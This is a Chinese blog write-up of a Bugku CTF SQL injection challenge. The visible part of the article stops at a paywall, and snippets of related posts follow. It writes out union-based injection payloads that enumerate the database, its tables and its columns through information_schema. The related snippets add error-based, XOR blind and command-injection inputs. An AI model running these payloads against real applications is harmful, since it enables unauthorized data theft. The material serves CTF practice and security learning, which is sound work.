ctf刷题笔记之sql注入-union注入|bugku CTF:成绩查询

最新推荐文章于 2024-04-26 21:09:14 发布
最新推荐文章于 2024-04-26 21:09:14 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 探索ing 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51614848/article/details/126376701
版权

题目来源:https://ctf.bugku.com/challenges/detail/id/84.html
参考文章:http://t.csdn.cn/GPx2P
http://t.csdn.cn/Y21UM

解题过程:

一、硬刚法

①向输入框中输入1有结果,输入1’ and 1=1#有结果,输入1’ and 1=2#无结果,判断可以进行SQL注入;
②向输入框中输入1’ order by 1#有结果,输入1’ order by 10#无结果,采用二分法逐个尝试,发现输入1’ order by 4#有结果,输入1’ order by 5#无结果,因此判断结果有四列。输入-1’ union select 1,2,3,4#结果如下,可以看出各个信息对应的位置。
在这里插入图片描述
③向输入框中输入-1’ union select database(),2,3,4#得知数据库名为skctf,
输入-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘skctf’),3,4#得知数据库中的表名为fl4g和sc。
④向输入框中输入-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘skctf’ and table_name=‘fl4g’),3,4#得到列名skctf_flag&#

最低0.47元/天 解锁文章
iridescent3055
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
CTF系列之Web——联合查询注入
洛柒尘的博客
06-27 3138
前言 在刚学习SQL注入的过程中非常艰难,资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的SQL注入知识点。 学习web系列推荐先学习MySQL、H
CTF——web安全(六)
最新发布
qq_45215609的博客
04-26 324
CTF——web安全(六) 题目一:成绩查询
CTFHub-web(SQL注入)
qq_49502930的博客
12-04 223
ctf技能树sql注入
BMZCTF union 详解
u013797594的博客
07-19 1016
BMZCTF union 详解 题目: 打开题目是这样的一个登录框: 解题思路: 首先还是做下信息收集,dirsearch跑一跑发现一些文件,但是都没有权限访问: 1.文件包含漏洞 观察一下访问的url,file=xxx可能存在文件包含漏洞,网页源码上也有提示,但是按照网页源码的去访问还是转到login页面。看到文件包含漏洞不要慌,先上咱们的lfi字典生成器爆破一波~。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 工具地址:https://github.com/87306052
ctf从入门到放弃学习笔记SQL注入基于union的信息获取 190509
爱党人士
05-09 713
union 联合查询: 可以通过联合查询查询指定的数据 用法举例: select username,password from user where id=1 unionselect 字段1,字段2 from 表名 联合查询的字段数需要和主查询一致!‘ 如何确定字段数??-》order by了解一下吧 然后, 用union查询又有什么用呢? 用union的目的是为了获得更多的信息...
ctf-web-成绩查询
god_001的博客
04-13 1094
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
sql注入攻击流量情况
07-18
sql注入攻击流量情况
CTF学习笔记SQL注入(显错注入)
a12332251的博客
12-07 705
SQL注入
Bugku CTF成绩查询[WriteUP]
如有错误感谢斧正
11-25 313
看抓到的包最下面是id,选择注入点为:id进行注入。这里我把包信息txt保存为post.txt。复制Raw内容进txt文件用于sql注入。直接展示skctf_flag中的值即可。很明显应该就是‘skctf
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3921
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
青少年CTF——BabySQLi——Writeup
Amazingsuger的博客
01-19 485
青少年CTF——BabySQLi——WriteUp
buuctf love sql 保姆级攻略,看完就会,5分钟速成union联合注入
weixin_74320581的博客
05-17 385
buuctf love sql 从0到1 保姆级攻略
CTF-SQL
qq_61774705的博客
08-12 803
CTF-SQL
buuctf-颜值成绩查询(sql注入)
一直在水些技术小文
05-19 549
输入1-4都是可以的,从5开始就不存在了 多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了 但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists 尝试一下异或注入 输入10正确,1错误,说明是异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果 错误的结果是这样的 通过这个可以最终得到f..
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值